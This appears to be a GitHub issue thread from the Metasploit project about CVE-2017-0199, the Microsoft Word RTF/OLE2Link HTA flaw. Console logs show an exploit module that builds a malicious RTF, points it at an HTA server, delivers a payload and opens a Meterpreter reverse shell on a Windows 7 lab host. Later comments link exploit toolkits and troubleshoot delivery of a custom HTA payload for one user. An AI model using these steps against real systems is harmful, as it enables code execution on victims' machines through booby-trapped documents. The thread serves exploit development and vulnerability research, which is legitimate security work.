64 00 6f 00 63 00 00 00 |a.t.e...d.o.c...| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 79 58 81 f4 |............yX..| 3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00 00 00 |;..H.,.]..'c....| a5 ab 00 00 ff ff ff ff 20 69 33 25 f9 03 cf 11 |........ i3%....| 8f d0 00 aa 00 68 6f 13 00 00 00 00 ff ff ff ff |.....ho.........| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 10 00 03 00 04 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| } ** 3 directory entries { sid => 0x0, _ab => "Root Entry", _cb => 0x0016, _mse => 0x05, _bflags => 0x00, _sidLeftSib => 0xffffffff, _sidRightSib => 0xffffffff, _sidChild => 0x00000001, _clsId => 00000300-0000-0000-c000-000000000046, _dwUserFlags => 0x00000000, _ctime => 00 00 00 00 00 00 00 00 |........| _mtime => 10 4e ab 9b 42 49 d2 01 |.N..BI..| _sectStart => 0x00000003, _ulSize => 0x0000000000000200, children* => { sid => 0x1, _ab => "\x01Ole", _cb => 0x000a, _mse => 0x02, _bflags => 0x01, _sidLeftSib => 0xffffffff, _sidRightSib => 0x00000002, _sidChild => 0xffffffff, _clsId => 00000000-0000-0000-0000-000000000000, _dwUserFlags => 0x00000000, _ctime => 00 00 00 00 00 00 00 00 |........| _mtime => 00 00 00 00 00 00 00 00 |........| _sectStart => 0x00000000, _ulSize => 0x00000000000001a8, data => --NOT OPENED YET-- } { sid => 0x2, _ab => "\x03ObjInfo", _cb => 0x0012, _mse => 0x02, _bflags => 0x00, _sidLeftSib => 0xffffffff, _sidRightSib => 0xffffffff, _sidChild => 0xffffffff, _clsId => 00000000-0000-0000-0000-000000000000, _dwUserFlags => 0x00000000, _ctime => 00 00 00 00 00 00 00 00 |........| _mtime => 00 00 00 00 00 00 00 00 |........| _sectStart => 0x00000007, _ulSize => 0x0000000000000006, data => --NOT OPENED YET-- }

}

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-294119947, or mute the thread https://github.com/notifications/unsubscribe-auth/ADbf0iae2mF2auyDbhq-BYNKFj86mbiYks5rvzU0gaJpZM4M5lMa .

nixawk commented 7 years ago

@busterb @vysec CVE-2017-0199 module is created. Please wait more tests.

msf exploit(ms17_0199_rtf) > info

       Name: MS14-017 Microsoft Word RTF Object Confusion
     Module: exploit/windows/fileformat/ms17_0199_rtf
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-04-14

Provided by:
  Haifei Li
  ryHanson
  wdormann
  DidierStevens
  vysec
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   Microsoft Office

Basic options:
  Name       Current Setting                 Required  Description
  ----       ---------------                 --------  -----------
  TARGETURI  http://192.168.206.144/poc.rtf  yes       The path to a hta file.

Payload information:

Description:
  This module creates a malicious RTF file that when opened in
  vulnerable versions of Microsoft Word will lead to code execution.
  The flaw exists in how a olelink object can make a http(s) request,
  and execute response in hta format. This bug was originally seen
  being exploited in the wild starting in Oct 2016. This module was
  created by reversing a public malware sample.

References:
  https://cvedetails.com/cve/CVE-2017-0199/
  https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
  https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
  https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/
  https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
  https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html
  https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf
  https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
  https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100
  https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
  https://www.microsoft.com/en-us/download/details.aspx?id=10725
  https://msdn.microsoft.com/en-us/library/dd942294.aspx
  https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf
msf exploit(ms17_0199_rtf) > run

[+]  stored at /Users/nixawk/.msf4/local/local_1492191967.bin
~ ->> rtfobj /Users/nixawk/.msf4/local/local_1492191967.bin
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: '/Users/nixawk/.msf4/local/local_1492191967.bin' - size: 5751 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |000001BCh |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
nixawk commented 7 years ago 
msf exploit(hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Powershell x86

msf exploit(hta_server) > set URIPATH /test
URIPATH => /test
msf exploit(hta_server) > run -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
msf exploit(hta_server) > use exploit/windows/fileformat/ms17_0199_rtf
msf exploit(ms17_0199_rtf) > show options

Module options (exploit/windows/fileformat/ms17_0199_rtf):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   TARGETURI  http://example.com/test.rtf  yes       The path to a hta file.

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office

msf exploit(ms17_0199_rtf) > set TARGETURI http://192.168.1.102:8080/test
TARGETURI => http://192.168.1.102:8080/test
msf exploit(ms17_0199_rtf) > run

[+]  stored at /Users/Open-Security/.msf4/local/local_1492193615.bin
msf exploit(ms17_0199_rtf) >
[*] 192.168.1.103    hta_server - Delivering Payload
[*] 192.168.1.103    hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:2187) at 2017-04-14 13:17:45 -0500

msf exploit(ms17_0199_rtf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JOHN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : SECLAB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
busterb commented 7 years ago

Nice work @nixawk !

vysecurity commented 7 years ago

Nice work @nixawk :)

demonsec666 commented 7 years ago

HI !Man.Can you provide ms17_0199_rtf,rb code @nixawk

demonsec666 commented 7 years ago

ruby code?? @nixawk

demonsec666 commented 7 years ago

metasploit?

vysecurity commented 7 years ago

@demonsec666 I think Nixawk will submit as a PR. This isn' t a support thread.

https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/

nixawk commented 7 years ago

I will. Please wait serval days.

demonsec666 commented 7 years ago

thanks @nixawk

nixawk commented 7 years ago

@vysec @busterb @demonsec666 Please check https://github.com/rapid7/metasploit-framework/pull/8254

demonsec666 commented 7 years ago

Nice work!thanks :)

jork2345 commented 7 years ago

gre

bhdresh commented 7 years ago

Nice one, thank you,

Meanwhile this was my attempt to get meterpreter shell through CVE-2017-0199

https://github.com/bhdresh/CVE-2017-0199

nixawk commented 7 years ago

If dev team handles https://github.com/rapid7/metasploit-framework/pull/8253, maybe I'll try a new with meterpreter session.

vysecurity commented 7 years ago

Just FYI. OLE links made in 2016 differ from other versions such as 2013. Therefore I found that a 2016 document could not be triggered on a 2013 machine.

nixawk commented 7 years ago

@vysec Could you share a copy ?

moaeddy commented 7 years ago

i have been trying to figure this out but not seems to get it, i host .hta file and insert it via insert-object but can't see any hta file executing. can someone share how this can be archived?

bhdresh commented 7 years ago

Hi,

Are you trying with "exploit/windows/misc/hta_server"? it was not working for me either. It pop-up a black screen but no reverse connection from reverse shell.

To overcome this I wrote a quick py script which could generate malicious doc based on @nixawk https://github.com/nixawk template and also act as a HTA web server to deliver the payloads.

Have a loot @ https://github.com/bhdresh/CVE-2017-0199

Regards, -Bhadresh

On 19 April 2017 at 08:03, hostbob notifications@github.com wrote:

i have been trying to figure this out but not seems to get it, i host .hta file and insert it via insert-object but can't see any hta file executing. can someone share how this can be archived?

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-295072712, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLdfYQaVXFG8919vNyuXSF18LT7pLks5rxYd_gaJpZM4M5lMa .

bhdresh commented 7 years ago

Hi,

Are you trying with "exploit/windows/misc/hta_server"? it was not working for me either. It pop-up a blank screen but no reverse connection from reverse shell.

To overcome this I wrote a quick py script which could generate malicious doc based on @nixawk https://github.com/nixawk template and also act as a HTA web server to deliver the payloads.

Have a loot @ https://github.com/bhdresh/CVE-2017-0199

Regards, -Bhadresh

On 19 April 2017 at 09:08, Bhdresh bhdresh@gmail.com wrote:

Hi,

Are you trying with "exploit/windows/misc/hta_server"? it was not working for me either. It pop-up a black screen but no reverse connection from reverse shell.

To overcome this I wrote a quick py script which could generate malicious doc based on @nixawk https://github.com/nixawk template and also act as a HTA web server to deliver the payloads.

Have a loot @ https://github.com/bhdresh/CVE-2017-0199

Regards, -Bhadresh

On 19 April 2017 at 08:03, hostbob notifications@github.com wrote:

i have been trying to figure this out but not seems to get it, i host .hta file and insert it via insert-object but can't see any hta file executing. can someone share how this can be archived?

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-295072712, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLdfYQaVXFG8919vNyuXSF18LT7pLks5rxYd_gaJpZM4M5lMa .

nixawk commented 7 years ago

Please try it with a IE cache clean.

moaeddy commented 7 years ago

thanks for your response

Am i doing this wrong, what i did was. i host an .hta file and insert into object in ms word then save it as .rtf

i have tried your python script before messaging here but it gives this error in the image

http://prntscr.com/ey5bg0

can u kindly put me through properly as i am using a custom .hta and custom way to get connection from user who run the .rtf file

nixawk commented 7 years ago

@hostbob I've created a py script for the job.

https://github.com/nixawk/labs/blob/master/CVE-2017-0199/exploit.py

bhdresh commented 7 years ago

@hostbob,

Hosting and inserting an .hta file manually will directly execute it while inserting in to rtf.

For script, try to execute python script as "python cve-2017-0199_toolkit.py -h"

https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/master/cve-2017-0199_toolkit.py

Regards, -Bhadresh

moaeddy commented 7 years ago

I really appreciate your time bro, this is what i have done

https://2.lithi.io/qDoxsQ5.png https://2.lithi.io/z8WFm.png https://2.lithi.io/oXANtQ.png https://2.lithi.io/YyMnq.png

But getting error at the end of execution, kindly advice what i am missing

moaeddy commented 7 years ago

oh less i forget, tested on windows 7 32bit ms word 2007 and windows 8 ms word 2010 32bit also

jymcheong commented 7 years ago

If some of you are having difficulty reproducing the observation in Win7, you are likely using a fresh Win7, see https://www.youtube.com/watch?v=ac6LM7WAx64

I noted @nixawk observation regarding the registry key but it seems like a fresh Win7 regardless SP1 or not is not vulnerable. By "fresh", I mean hardly any patches installed. See the video for yourself. The VM that has black background also has reg_sz:ole32.dll for that registry key but was able to pop a calculator.

moaeddy commented 7 years ago

saw the video, but this was tested against windows 7 32bit vmware and windows 8 32bit vmware. is this also affect windows 8 and windows server 2008. i only got pop warning but file not executed

bhdresh commented 7 years ago

@hostbob, Looks like the document was generated properly.

As per instruction, once the document will be opened it will request http://2.lithi.io/5LjNsE.HTA and try to execute it.

Please share what is not working here? Are you not receiving "https://2.lithi.io/5LjNsE.HTA" request from target once document is opened or is this HTA not getting executed after delivery? It seems "https://2.lithi.io/5LjNsE.HTA" is not delivering the toolkit's HTA which is tested and working fine.

If you want to use custom HTA, please make sure it is getting executed and not having any error.

I recommend to point "https://2.lithi.io/5LjNsE.HTA" this to the machine where the tool is running and start the toolkit in exploitation mode (-M exp) with required parameters.

For this, you could follow the step 2 and 3 specified in the README.md or listed at https://github.com/bhdresh/CVE-2017-0199

Thanks a lot.

Regards, -Bhadresh

jymcheong commented 7 years ago

@hostbob,

@bhdresh asked good questions. Try with a simple test-case first, eg. the launch calculator HTA script that was shared earlier in this thread. If that works, then it has something to do with the custom HTA.

If even the simple test-case doesn't work, check that your web-server that is hosting the HTA file is forcing Content-Type as application/hta, otherwise the hta would just be rendered in the linked object.

bhdresh commented 7 years ago

@jymcheong , thank you :)

@hostbob , just follow the instructions provided in the guide at https://github.com/bhdresh/CVE-2017-0199, the toolkit could acts as a HTA + Web server so just point your HTA URL you are including in RTF to toolkit port in exploitation mode and its done :)

Please feel free of you have any question or issue.

Regards, -Bhadresh

moaeddy commented 7 years ago

ok i am gonna admit i am dump and can't seems to get this. i do not know what i am really missing. @bhdresh can you please inbox me your email or IM ID at edwardmoa@mail.ru? maybe an instant chat will solve this

Thank you @jymcheong for your contribution as well

bhdresh commented 7 years ago

@hostbob , no issues buddy, I sent you an email :)

moaeddy commented 7 years ago

@bhdresh i think you are busy, please anyone still have interest in helping out in this? i am using a custom hta file. what i do not understand is can this exploit work without using metasploit thing and is it only hta file it can work on? kindly share your idea brothers i will love to see me being successful testing this i hate trying to test something and see myself not getting it :D

bhdresh commented 7 years ago

@hostbob, I am updating python script at https://github.com/bhdresh/CVE-2017-0199 to push custom hta.

Usage: python cve-2017-0199.py -M exp -H custom.hta

Hope this will help.

moaeddy commented 7 years ago

you have been really helpful @bhdresh i really appreciate your help from the start. when do you think will be done?

bhdresh commented 7 years ago

Please try beta version from https://github.com/bhdresh/CVE-2017-0199/blob/v2.0-beta-3/cve-2017-0199_toolkit.py

On 20 April 2017 at 17:01, hostbob notifications@github.com wrote:

you have been really helpful @bhdresh https://github.com/bhdresh i really appreciate your help from the start. when do you think will be done?

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-295729305, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLdF63wi4L3fgjC6D_Re-EqO2TWJCks5rx1cSgaJpZM4M5lMa .

snemes commented 7 years ago

Just a sidenote, you will need to have Internet Explorer 10 installed for the exploit to work under (a fresh) Windows 7.

moaeddy commented 7 years ago

how about windows 8,8.1 and 10 both 32 and 64bit? it requires this as well?

snemes commented 7 years ago

As far as I know Windows 8 already comes with Internet Explorer 10 preinstalled, so I guess you don't need to do anything there - but I have not tried it. If you do, please share the results with us too. :)